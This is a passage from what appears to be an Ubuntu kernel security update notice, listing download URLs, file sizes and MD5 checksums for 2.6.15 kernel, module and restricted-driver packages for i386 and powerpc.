    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    11760 cbc03faf559770f4852dc74c07694bd3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    36002 48af4ae4241d5cc51f48ba897607338d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:   132560 7b156c654c64ed9d4349cf37b50c8e83
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:    38560 182a92fbedf7a9a63f7c47388f12a5c9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-386-di_2.6.15-54.76_i386.udeb
      Size/MD5:   299112 70173137e68d2da69169e29521da953f
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/avm-fritz-kernel-source_3.11+2.6.15.12-54.5_i386.deb
      Size/MD5:  3692794 305ce2ecb7bd3ef67d88b534a4b0d477
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/fglrx-kernel-source_8.25.18+2.6.15.12-54.5_i386.deb
      Size/MD5:   661106 8870754251dba3a607fcdcc0a8860be1
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-kernel-source_1.0.8776+2.6.15.12-54.5_i386.deb
      Size/MD5:  1694548 4e46298b480e3919ded39ac7bfd6abec
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-legacy-kernel-source_1.0.7174+2.6.15.12-54.5_i386.deb
      Size/MD5:  1402008 6c43cec2b71d3515cb8893deab381d11
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/avm-fritz-firmware_2.6.15.55_i386.deb
      Size/MD5:    23748 9842122cf7354dccc2d0efdee17b6144
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-386_2.6.15.55_i386.deb
      Size/MD5:    23714 2df5b64779bfe8951be1d4c2218ecc8b
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-686-smp_2.6.15.55_i386.deb
      Size/MD5:    23816 6315b163b8ad4340fd30d0a68d75d883
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-686_2.6.15.55_i386.deb
      Size/MD5:    23744 28abc348aa9894997d017acba243387e
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-k7-smp_2.6.15.55_i386.deb
      Size/MD5:    23796 000439d9e252d4b90777bc77612cb73b
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-k7_2.6.15.55_i386.deb
      Size/MD5:    23730 d071666b0c25a37ad507ffdb6c1dabd8
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-restricted-modules-386_2.6.15.55_i386.deb
      Size/MD5:    23732 9a5b22c00340e6284037cb4493be17ce
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-restricted-modules-686_2.6.15.55_i386.deb
      Size/MD5:    23764 14eb7f4f7a4851033f1f17495a9e1b93
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-restricted-modules-k7_2.6.15.55_i386.deb
      Size/MD5:    23748 6b370067e8e08641922ed4749ce026f0
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-server-bigiron_2.6.15.55_i386.deb
      Size/MD5:    23740 fa0149dc250999c973b9ebcc21577562
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux-server_2.6.15.55_i386.deb
      Size/MD5:    23722 3f79a55fc3fac819512350391ea8edfb
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-meta/linux_2.6.15.55_i386.deb
      Size/MD5:    23688 7a8e19aa7b538cce43d426eb16bac686
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/avm-fritz-firmware-2.6.15-54_3.11+2.6.15.12-54.5_i386.deb
      Size/MD5:  1205188 4cb8c83589042e5ef82f79aa426fd7e9
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/fglrx-control_8.25.18+2.6.15.12-54.5_i386.deb
      Size/MD5:    73706 8060235b3ffa311bf7c549621250f9d1
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-54-386_2.6.15.12-54.5_i386.deb
      Size/MD5:  8139032 cc9f9ad397e3d36f948c1992ca9dfd42
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-54-686_2.6.15.12-54.5_i386.deb
      Size/MD5:  7940286 f3bc3d564da3e795c1be46559f490400
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-54-k7_2.6.15.12-54.5_i386.deb
      Size/MD5:  7939084 c13f15e02516ed00aba77935c280cd62
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-firmware-2.6.15-54-386-di_2.6.15.12-54.5_i386.udeb
      Size/MD5:   798684 0de7e319bfc4f61173b72cd9fba285b8
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-modules-2.6.15-54-386-di_2.6.15.12-54.5_i386.udeb
      Size/MD5:   476148 29519a118a4987060f6b728e1e4374fb
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-dev_1.0.8776+2.6.15.12-54.5_i386.deb
      Size/MD5:   148078 465104c9128199461dc3ff29c9e60e4c
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy-dev_1.0.7174+2.6.15.12-54.5_i386.deb
      Size/MD5:   140544 8e9588afe1a269f5ee19d7a1d42cd4f8
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy_1.0.7174+2.6.15.12-54.5_i386.deb
      Size/MD5:  3060782 1da25d4f7204e7cefe8f5d45fb4bb298
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx_1.0.8776+2.6.15.12-54.5_i386.deb
      Size/MD5:  4063708 3c8a6e7acb40e4fad4597e90420c5b01
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx-dev_7.0.0-8.25.18+2.6.15.12-54.5_i386.deb
      Size/MD5:   111356 56db81866840fce46009bccbbe15acb0
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx_7.0.0-8.25.18+2.6.15.12-54.5_i386.deb
      Size/MD5: 10557564 50e1c3ae85d3ed7c6d94156624aac87a

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-powerpc-smp_2.6.15-54.12_powerpc.deb
      Size/MD5:   185736 a2c8936898b5e1ef683c84fd713f8722
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-powerpc64-smp_2.6.15-54.12_powerpc.deb
      Size/MD5:   203512 68f34ab359322278e73a1c9f35ac8aa2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-54-powerpc_2.6.15-54.12_powerpc.deb
      Size/MD5:   183982 cd2481637c2dabf0f75f5121f5854928
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-54-powerpc-di_2.6.15-54.12_powerpc.udeb
      Size/MD5:    98100 9d8679099f9b0385be4a3764c635dc4b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.12_powerpc.udeb
      Size/MD5:   121802 581f60e2449ec7e1c60da72ba3fe33e3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-54-powerpc-di_2.6.15-54.12_powerpc.udeb
      Size/MD5:   103320 283a21bbdd8cce84736554f7afb985a6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.12_powerpc.udeb
      Size/MD5:   112216 f7778eebbb5d925c49d1d85e7d9cb82e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-powerpc-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23728 0d997bb79a240dd64a6ed891faba4f13
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-powerpc64-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23726 4993c7a163f0658baacdf5f73b21844d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-backports-modules-powerpc_2.6.15.55_powerpc.deb
      Size/MD5:    23720 d18e93892fb0ac265b91d1a29c2ef2a0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-power3-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23826 4d2407a4cfafe7648c60b1a7d87500ff
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-power3_2.6.15.55_powerpc.deb
      Size/MD5:    23764 d5098ac0c4ffa901f982573f50e9d321
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-power4-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23828 8122a3ecee70af23436e64524b10670d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-power4_2.6.15.55_powerpc.deb
      Size/MD5:    23766 b8ed7cc80e658616091c4e1dfa5086f5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-powerpc-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23786 5829a89d8189f446c24de2b282fbcd51
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-powerpc64-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23794 bef26d4cca973fd1c06bf6ee51ff4a49
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-powerpc_2.6.15.55_powerpc.deb
      Size/MD5:    23722 4110a4efaed86fb9644802b631b8487c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-power3-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23828 b495ba5a987e3cc7bde27aacdce484da
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-power3_2.6.15.55_powerpc.deb
      Size/MD5:    23760 ba2b0ce0f442dd54966c5c9ba40ed4dc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-power4-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23824 4aae406239e31b6bffb76d1c5c3a344d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-power4_2.6.15.55_powerpc.deb
      Size/MD5:    23758 56a9501ef592ba5c1d7e70deaab5ee92
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-powerpc-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23786 a0449c30fc0cc7359dab5d24958fee4a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-powerpc64-smp_2.6.15.55_powerpc.deb
      Size/MD5:    23790 5b2dcc723206288a92923696bbe4c8b9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-powerpc_2.6.15.55_powerpc.deb
      Size/MD5:    23716 e8c17c8c82be3a136f5411f9c4044c92
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    23728 30efcf43e5d4294888074d172fc3447c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    25948 3d1b8da2ce97e726f8869a4fe499dd04
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    49318 283000fcf1757e032623fc75ca829b15
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    51522 25a5d41e9aa26ab7ccf32d6346603763
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:     2306 48e6c28fe19f7d6c5da3fb5166780726
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:     2482 69e4ac4b222f1708d2aa19701b2ce474
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    40188 887dd7365c5a83181673bd34348fe30a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    43754 78f9ca8b0c682a47811689c724076bd2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   112592 a4b7de9ad4bea93b5410cd6135a8e4ff
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   120664 27b42847f09dc28e1b768b65c1a98ea5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    40852 4ae989d02adc01827f8746e48c7de7df
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    45958 5ad7d6d32edff2b32a37dea23a703b4f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    29024 10ccfb30d205c271bf994d0190527b40
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    29900 c85b0e665b5420c4b10502eac927e3e1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   211402 36e2cbd97b8e89a320d9f3e9d342816f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   225216 23f3855b578e2db1068c27bb2f34b556
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    45052 c8d1695952597dff2f3bfdeb1bf5fcef
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    40222 23144259c2cee7549ec37a702c0d7529
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:     1936 92e0770efe368895145ce00828a60ad8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:     2198 185f9535026469ae18e87ecceac60832
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    80680 4f43424ef68d14117a04f01f9806e59a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    86076 f95a187627606f6726fa0ea02ad1f004
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   111634 f8960181ffa0d0cd023d707b03c1174f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   125764 aa11ed18f55b349ee390aa42c55be3e3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    53412 675e70ab92691997559986573a1a03cb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    58478 b9c37108a6c04139802e2c5ec910ca25
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   147766 b2b15943f6cf93c27a265750a3a31082
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   161710 645c26798a00d77876f80ea6bbfe0a2f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   317500 2ba0d09b99e17b71442db7b8961390b6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   287604 3a643220e2a99dffe04a4bbffbc96f34
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   115856 5f0e77aff769deeed9efdc0d594ab2e5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   116516 19f3f004aa5f993a7717aa68cd6eb73f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:  1924296 8b23e47ada36e2005fecae9b92fa1d5c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:  2447432 3872d2b69590e52a3f6403bfadd6a331
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc-smp_2.6.15-54.76_powerpc.deb
      Size/MD5:   872984 c162b0cd57bd3dc67dacafc00fd98f92
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc64-smp_2.6.15-54.76_powerpc.deb
      Size/MD5:   869992 173fdee25c7a5892d3f64c79cc233be2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc_2.6.15-54.76_powerpc.deb
      Size/MD5:   864722 5bc98d274f8e164ddea8562cb000e901
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.76_powerpc.deb
      Size/MD5:  6946212 42a3ee398cdf0dc0d3449625a5ab97a0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc-smp_2.6.15-54.76_powerpc.deb
      Size/MD5: 22775872 9dd0515277c4ab14ce57fa7bb4487ceb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc64-smp_2.6.15-54.76_powerpc.deb
      Size/MD5: 23679230 f5c026af277b928cfa14591b99b9a343
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc_2.6.15-54.76_powerpc.deb
      Size/MD5: 22355436 3ff7dad22fcd1a2f40011e826d9f239d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    17782 a05248936783011872ff3ba2598b04d0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    17380 7dd2b2e35df6f582439d25d244631ef4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   261282 491347558d2758a9fc559c9e27525c7a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   282490 c1c29d86e9133b0734045b77d8b9092b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   227678 4c1d46968570e724025318a49d4044c7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   248850 9b99b7acecac0b1ced2ed619202bc3b9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:  1048466 3b7d42e93c0b28ac317eed66f045d14a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:  1048598 32cd35abb0024715752e78ce31271d99
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:  1737810 e92672ab08f764e2cb3e73b9e5818c3d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:  1877270 5dceb5b750870e504a71752738577184
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   250902 f3fcfdc550cbedd2a80ff02024336521
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   233628 2878802687ae6b7eb386e9e791f15b0a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    13028 9893b1ba446e49e1502dd55fa736da0b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    13520 54a2268d9e9671f748e321443b2ec85f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    84836 23f202e623344bdab5a9fd3602d03861
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    52196 6a7fce34cc2af097d7dfb8ee5d4cba19
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    73910 905c674edef35faa7c7c04484c7e41d7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    85844 af22fada4409b0e9edc3af902099b452
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:     6622 b7747b0d05a9a0bd7961c54d2f79803f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:     7066 efaec9a8541ef08957cc1497acf701c1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    60390 0c47842a7cec9693a7ced28c38651b97
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    70388 ad4827b95efc80c027c87e99ea180541
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   128556 789cac3f8ddf2a212a4d0073a2cbada5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   157808 67cac5ee9babea967675735d551afd7b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   108040 ffa27022856071d267154adfc0fb0b7b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   126044 d288e6bc25effb52860adcfc209c0579
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    87304 2c77684ea88bce914f6b92417cdd7b1f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    93314 6daa488ccac4dc1c0b1eccbd86d73e79
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:  2014010 4f3a5b5ad45c3fe8c8782bf55d01967c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:  1988092 f539a99ddb1099658853ae6413ade64e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   104108 5f30118b7ce1334d994136e57b41699c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   115700 cbc7ac4eecec51986e89394afd767b6b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    12738 95abad88c96e831ba33063f66895445b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    14446 58b82e5c505104691d1dd5950e8b3faf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    39950 acd3c58d74de7facfbfa7b5d15a2254a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:    41472 6142fd1bcdb36bad47a9b5d35c1b6d56
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-powerpc-di_2.6.15-54.76_powerpc.udeb
      Size/MD5:   149302 f5746d2b211ed7b8381c767786d739ac
